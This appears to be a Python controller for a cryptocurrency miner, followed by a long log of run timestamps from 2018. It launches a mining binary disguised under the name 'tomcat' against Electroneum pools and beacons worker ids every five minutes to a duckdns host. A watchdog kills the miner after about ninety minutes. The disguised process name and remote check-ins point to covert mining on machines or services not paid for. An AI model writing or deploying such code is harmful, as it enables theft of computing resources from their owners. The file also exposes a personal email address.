import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:05.164892
#2018-02-17 16:14:05.142026
#2018-02-17 18:02:07.582152
#2018-02-17 19:49:05.669335
#2018-02-17 21:37:04.468429
#2018-02-17 23:21:03.864986
#2018-02-18 01:09:06.065744
#2018-02-18 02:57:06.664389
#2018-02-18 04:44:01.455470
#2018-02-18 06:36:05.408425
#2018-02-18 08:24:01.296417
#2018-02-18 10:12:07.291462
#2018-02-18 11:58:06.927314
#2018-02-18 13:43:06.057508
#2018-02-18 15:34:01.950637
#2018-02-18 17:22:03.614081
#2018-02-18 19:11:01.719394
#2018-02-18 20:57:01.567712
#2018-02-18 22:44:05.240582
#2018-02-19 00:33:03.805062
#2018-02-19 02:18:04.233117
#2018-02-19 04:05:08.412521
#2018-02-19 05:49:05.802198
#2018-02-19 07:37:05.992404
#2018-02-19 09:26:08.648640
#2018-02-19 11:15:04.811746
#2018-02-19 13:02:07.746907
#2018-02-19 14:51:07.209718
#2018-02-19 16:39:07.841514
#2018-02-19 18:26:04.332020
#2018-02-19 20:11:04.752583
#2018-02-19 22:02:05.340579
#2018-02-19 23:49:05.542053
#2018-02-20 01:34:07.864349
#2018-02-20 03:22:02.052418
#2018-02-20 05:08:07.802463
#2018-02-20 06:52:03.366757
#2018-02-20 08:39:07.932725
#2018-02-20 10:23:03.723164
#2018-02-20 12:08:08.156311
#2018-02-20 13:58:01.391155
#2018-02-20 15:42:02.223955
#2018-02-20 17:28:07.159693
#2018-02-20 19:17:07.198468
#2018-02-20 21:06:08.110517
#2018-02-20 22:54:01.948723
#2018-02-21 00:38:01.276297
#2018-02-21 02:25:05.736474
#2018-02-21 04:11:06.529798
#2018-02-21 05:59:01.890208
#2018-02-21 07:47:07.417023
#2018-02-21 09:33:07.948080
#2018-02-21 11:21:06.711958
#2018-02-21 13:11:01.810102
#2018-02-21 14:57:07.340343
#2018-02-21 16:47:01.926182
#2018-02-21 18:40:03.761990
#2018-02-21 20:24:04.727301
#2018-02-21 22:11:08.096766
#2018-02-22 00:02:05.000012
#2018-02-22 01:49:05.836238
#2018-02-22 03:37:01.597978
#2018-02-22 05:23:05.484367
#2018-02-22 07:07:06.285058
#2018-02-22 08:53:05.794395
#2018-02-22 10:41:07.795915
#2018-02-22 12:27:01.982830
#2018-02-22 14:11:08.216005
#2018-02-22 15:58:05.652628
#2018-02-22 17:44:07.505165
#2018-02-22 19:31:02.025943
#2018-02-22 21:22:07.706349
#2018-02-22 23:08:08.751691
#2018-02-23 00:55:04.211509
#2018-02-23 02:42:02.116876
#2018-02-23 04:30:04.294470
#2018-02-23 06:15:06.862699
#2018-02-23 08:02:02.132539
#2018-02-23 10:16:04.577120
#2018-02-23 12:09:10.972622
#2018-02-23 13:57:04.243766
#2018-02-23 15:48:04.637755
#2018-02-23 17:34:02.016199
#2018-02-23 19:20:10.192283
#2018-02-23 21:04:07.002779
#2018-02-23 22:50:09.090147
#2018-02-24 00:40:08.106379
#2018-02-24 02:31:02.015259
#2018-02-24 04:24:01.860372
#2018-02-24 06:09:05.256352
#2018-02-24 07:56:01.735622
#2018-02-24 09:40:09.137908
#2018-02-24 11:36:07.638078
#2018-02-24 13:27:01.943960
#2018-02-24 15:15:07.117334
#2018-02-24 17:04:03.780073
#2018-02-24 18:55:01.649397
#2018-02-24 20:42:06.683773
#2018-02-24 22:52:06.247111
#2018-02-25 02:12:06.711085
#2018-02-25 05:36:03.434015
#2018-02-25 11:35:04.462071